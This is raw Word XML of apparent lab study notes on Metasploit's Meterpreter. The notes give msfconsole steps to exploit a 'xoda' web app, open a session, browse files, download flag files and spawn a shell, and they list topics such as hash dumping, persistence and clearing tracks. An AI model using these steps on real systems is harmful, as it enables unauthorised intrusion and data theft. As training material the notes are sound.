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C8F2" w14:textId="3DD6ED1A" w:rsidR="005B6C5A" w:rsidRPr="00857A89" w:rsidRDefault="005B6C5A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00740DA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter Fundamentals</w:t>
      </w:r>
      <w:r w:rsidRPr="00740DA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F2741" w14:textId="0FE1ED21" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A8AB8F8" wp14:editId="2DDACC28">
            <wp:extent cx="2944800" cy="2723942"/>
            <wp:effectExtent l="0" t="0" r="8255" b="635"/>
            <wp:docPr id="71223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2702" name="Picture 7122327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817" cy="27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44AB" w14:textId="0250DA7E" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:t>Local enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23D611" w14:textId="3A89BA07" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:t>Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AE34D" w14:textId="1E6DCB7C" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:t>Dumping hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AF92C" w14:textId="3AD7F944" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:t>Establishing persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944819C" w14:textId="0A137DEA" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:t>Clearing your tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047B552" w14:textId="41E660C2" w:rsidR="00740DA0" w:rsidRDefault="00740DA0">
      <w:r>
        <w:t>Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A777E0" w14:textId="77777777" w:rsidR="00740DA0" w:rsidRDefault="00740DA0"/>
    <w:p w14:paraId="5F299E6D" w14:textId="400235FD" w:rsidR="00884117" w:rsidRDefault="00884117">
      <w:r>
        <w:t>Meterpreter payload is an advanced multi-functional payload that operates via DLL injection and is executed in memory. (difficult to detect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C29CF26" w14:textId="0804516C" w:rsidR="00884117" w:rsidRDefault="00F72F9D">
      <w:r>
        <w:t>Allow to load custom script and plugins dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B652822" w14:textId="370CE9AF" w:rsidR="00F72F9D" w:rsidRDefault="00F72F9D">
      <w:r>
        <w:t xml:space="preserve">Various types of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745EE885" w14:textId="1AEBFD26" w:rsidR="00F72F9D" w:rsidRDefault="00F72F9D">
      <w:r>
        <w:t xml:space="preserve">Work differs on Linux or differs on </w:t>
      </w:r>
      <w:r w:rsidR="006C521D">
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018018DA" w14:textId="298B3394" w:rsidR="006C521D" w:rsidRPr="006C521D" w:rsidRDefault="006C521D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C521D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15087977" w14:textId="09D5B5A5" w:rsidR="006C521D" w:rsidRDefault="006C521D"/>
    <w:p w14:paraId="1063BB24" w14:textId="3DE6335F" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="561DCA9F" w14:textId="14EA9EDC" w:rsidR="006C521D" w:rsidRDefault="006C521D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AD3DAFB" w14:textId="2F78E1C8" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795102C" w14:textId="1CFAFEA1" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00310242" w14:textId="591E56BE" w:rsidR="006C521D" w:rsidRDefault="006C521D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2486B621" w14:textId="63BA2D92" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E95DAE1" w14:textId="77777777" w:rsidR="006C521D" w:rsidRDefault="006C521D"/>
    <w:p w14:paraId="720DAD90" w14:textId="0D8FD378" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t># to identify the services run on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386F1DC" w14:textId="523AF48E" w:rsidR="006C521D" w:rsidRDefault="006C521D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2A0D6147" w14:textId="77777777" w:rsidR="006C521D" w:rsidRDefault="006C521D"/>
    <w:p w14:paraId="31D87BDB" w14:textId="26246ACB" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t>Curl http://target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D502ACA" w14:textId="1EB43833" w:rsidR="00884117" w:rsidRDefault="006C521D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>download</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the homepage of the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B721689" w14:textId="77777777" w:rsidR="006C521D" w:rsidRDefault="006C521D"/>
    <w:p w14:paraId="4953CE2D" w14:textId="49CEFFBC" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xoda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="144230F0" w14:textId="63CE6EC4" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C32107" w14:textId="58756200" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709DD4F" w14:textId="32CB781F" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t>Set TARGETURI /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923A331" w14:textId="4206BE76" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15148A3B" w14:textId="0B70D227" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t xml:space="preserve"># Get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247F5EC4" w14:textId="7651EB83" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00B7005C" w14:textId="3589F95C" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09DA9D75" w14:textId="5D2451A2" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t xml:space="preserve">#www-data is service account </w:t>
      </w:r>
      <w:r w:rsidR="00F23464">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F23464">
        <w:t>manage</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the web </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>server,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="00F23464">
        <w:t>doesn’t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268D47D4" w14:textId="77777777" w:rsidR="006C521D" w:rsidRDefault="006C521D"/>
    <w:p w14:paraId="2542FE55" w14:textId="50DD5CCB" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t>Help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C274825" w14:textId="03E20EBB" w:rsidR="006C521D" w:rsidRDefault="006C521D">
      <w:r>
        <w:t xml:space="preserve">#open doc of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="699DA4E1" w14:textId="77777777" w:rsidR="006C521D" w:rsidRDefault="006C521D"/>
    <w:p w14:paraId="13F0FC74" w14:textId="5D5421A4" w:rsidR="006C521D" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>Background/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B425A89" w14:textId="680BCA04" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F128CBB" w14:textId="417230E9" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sessions -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AEDEF4" w14:textId="43DECBAD" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>help</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> menu of sessions command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71746AA3" w14:textId="77777777" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE"/>
    <w:p w14:paraId="754518E8" w14:textId="3C9D167C" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t xml:space="preserve">Sessions -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysinfo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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495AD4A8" w14:textId="2B6B369A" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>#it does interact with session just run the command in that session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5420FED0" w14:textId="77777777" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE"/>
    <w:p w14:paraId="70704721" w14:textId="0B2B76A5" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>sessions -k 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2FA81" w14:textId="2D143567" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5DA3BF" w14:textId="77777777" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE"/>
    <w:p w14:paraId="1A8A89B2" w14:textId="16C75293" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:r w:rsidR="0056753C">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0196CF" w14:textId="257499BB" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>#list active session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE9733" w14:textId="77777777" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE"/>
    <w:p w14:paraId="7D9DE342" w14:textId="18E2492C" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t xml:space="preserve">Sessions -n </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xoda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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5E19A" w14:textId="0BDB58C3" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t xml:space="preserve">#naming the session as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xoda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C20EB5B" w14:textId="77777777" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE"/>
    <w:p w14:paraId="6170D268" w14:textId="349C3324" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t xml:space="preserve">Sessions </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539496F0" w14:textId="2EDE202F" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> out session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A4792" w14:textId="77777777" w:rsidR="00EB1ABE" w:rsidRDefault="00EB1ABE"/>
    <w:p w14:paraId="56887C60" w14:textId="65CE3DD1" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB15A15" w14:textId="66FAC147" w:rsidR="00F23464" w:rsidRDefault="00F23464">
      <w:r>
        <w:t xml:space="preserve">#in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D7F7DA5" w14:textId="77777777" w:rsidR="00F23464" w:rsidRDefault="00F23464"/>
    <w:p w14:paraId="42517E0A" w14:textId="0D39C4A0" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF2ECB" w14:textId="5B8E770D" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t># directory listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4689E" w14:textId="77777777" w:rsidR="0056753C" w:rsidRDefault="0056753C"/>
    <w:p w14:paraId="7B1695C4" w14:textId="6771555B" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CB2FF99" w14:textId="3D735318" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t xml:space="preserve">#current directory (work on both window and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025E848" w14:textId="2449B98F" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F6C6561" w14:textId="0A3D33B3" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t># to step one back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441914B7" w14:textId="088F0E02" w:rsidR="0056753C" w:rsidRDefault="0056753C"/>
    <w:p w14:paraId="233C48A9" w14:textId="4574393F" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>Cat flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF20477" w14:textId="0DD97F46" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EE56B" w14:textId="77777777" w:rsidR="0056753C" w:rsidRDefault="0056753C"/>
    <w:p w14:paraId="407BC2F9" w14:textId="2784904B" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>Edit flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F9E516" w14:textId="6EAB310C" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t># to edit it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53185492" w14:textId="77777777" w:rsidR="0056753C" w:rsidRDefault="0056753C"/>
    <w:p w14:paraId="33F92409" w14:textId="5FDE322B" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>Cd “secret files”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3A8631" w14:textId="56590268" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there is space between the name then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then in “”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A51884" w14:textId="77777777" w:rsidR="0056753C" w:rsidRDefault="0056753C"/>
    <w:p w14:paraId="108631FA" w14:textId="6DF87E6B" w:rsidR="0056753C" w:rsidRDefault="0056753C">
      <w:r>
        <w:t>Cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1354FAC1" w14:textId="16775F1C" w:rsidR="0056753C" w:rsidRDefault="00440314">
      <w:r>
        <w:t>Download flag5.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97B005" w14:textId="4239200E" w:rsidR="00440314" w:rsidRDefault="00440314">
      <w:r>
        <w:t xml:space="preserve"># to download </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52549508" w14:textId="6C2FE085" w:rsidR="00440314" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4ABAB" w14:textId="248F98FF" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t># background session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC15312" w14:textId="14795BE8" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BC3FB" w14:textId="0EBABA53" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Unzip flag5.zíp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191A5B5" w14:textId="673C029D" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35218554" w14:textId="555B4FDB" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Cat list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A3356" w14:textId="6B4A1C99" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A10D03" w14:textId="77777777" w:rsidR="00964875" w:rsidRDefault="00964875"/>
    <w:p w14:paraId="76AAA30F" w14:textId="3B6A8F01" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Checksum md5 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BB3F01" w14:textId="7E90BB62" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00964875">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00964875">
        <w:t xml:space="preserve">It prints </w:t>
      </w:r>
      <w:r w:rsidRPr="00964875">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only the MD5 checksum</w:t>
      </w:r>
      <w:r w:rsidRPr="00964875">
        <w:t xml:space="preserve"> of /bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6430D75F" w14:textId="20C99C00" w:rsidR="00B46B6F" w:rsidRDefault="00B46B6F"/>
    <w:p w14:paraId="00A70A23" w14:textId="77777777" w:rsidR="00B46B6F" w:rsidRDefault="00B46B6F" w:rsidP="00B46B6F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00964875">
        <w:t xml:space="preserve"> It returns the environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCB05B7" w14:textId="77777777" w:rsidR="00B46B6F" w:rsidRDefault="00B46B6F"/>
    <w:p w14:paraId="2C207839" w14:textId="31F1CAAD" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22631A" w14:textId="29E65914" w:rsidR="00B46B6F" w:rsidRDefault="00B46B6F">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00B46B6F">
        <w:t xml:space="preserve"> list of directories the shell searches to find executables when you type a command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF2FBA" w14:textId="7A960EEC" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> TERM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8C24E" w14:textId="19631370" w:rsidR="00964875" w:rsidRDefault="00B46B6F">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B46B6F">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B46B6F">
        <w:t xml:space="preserve"> terminal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B46B6F">
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B46B6F">
        <w:t xml:space="preserve"> name that tells programs how to control your terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCF263" w14:textId="77777777" w:rsidR="00B46B6F" w:rsidRDefault="00B46B6F"/>
    <w:p w14:paraId="2120EE3D" w14:textId="71701A71" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB88E31" w14:textId="42D98B2E" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>perform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46B6F">
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on entire system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96E18D" w14:textId="77777777" w:rsidR="00964875" w:rsidRDefault="00964875"/>
    <w:p w14:paraId="70C703C8" w14:textId="541D835D" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Search -d /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin -f *backdoor*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0380FECC" w14:textId="7D66AA9B" w:rsidR="00964875" w:rsidRDefault="00964875"/>
    <w:p w14:paraId="61A22549" w14:textId="4500A898" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Search -f *.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A6371" w14:textId="2F1CC2BA" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t># search for jpg file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740E1F3" w14:textId="77777777" w:rsidR="00964875" w:rsidRDefault="00964875"/>
    <w:p w14:paraId="35DFCDD5" w14:textId="3EADB484" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Search -f *.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="218D4638" w14:textId="1567F091" w:rsidR="00964875" w:rsidRDefault="00964875" w:rsidP="00964875">
      <w:r>
        <w:t xml:space="preserve"># search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A747F01" w14:textId="77777777" w:rsidR="00B46B6F" w:rsidRDefault="00B46B6F"/>
    <w:p w14:paraId="319C62D6" w14:textId="23AA61BE" w:rsidR="00964875" w:rsidRDefault="00964875">
      <w:r>
        <w:t>Download flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C686BF" w14:textId="77777777" w:rsidR="00964875" w:rsidRDefault="00964875"/>
    <w:p w14:paraId="13D10F3F" w14:textId="16ACEF7B" w:rsidR="00964875" w:rsidRDefault="0084535A">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
